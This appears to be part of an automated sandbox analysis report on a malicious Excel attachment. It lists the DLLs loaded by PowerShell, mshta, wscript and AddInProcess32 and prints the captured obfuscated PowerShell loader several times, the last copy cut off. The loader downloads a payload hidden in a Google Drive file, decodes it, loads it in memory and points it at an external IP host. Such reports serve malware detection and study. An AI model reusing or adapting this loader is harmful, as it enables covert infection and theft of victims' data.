        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mozglue.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dbghelp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msvcp140.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wsock32.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netapi32.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wkscli.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: samcli.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: samlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.pdbhP source: powershell.exe, 00000011.00000002.481877021.000000000283A000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.pdb source: powershell.exe, 00000005.00000002.442283646.0000000003A4E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.pdb source: powershell.exe, 00000011.00000002.481877021.0000000002687000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.pdbhP source: powershell.exe, 00000005.00000002.442283646.0000000003A62000.00000004.00000800.00020000.00000000.sdmp
        Source: A4230000.0.drInitial sample: OLE indicators vbamacros = False
        Source: Shipping Documents WMLREF115900.xlsInitial sample: OLE indicators encrypted = True

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE 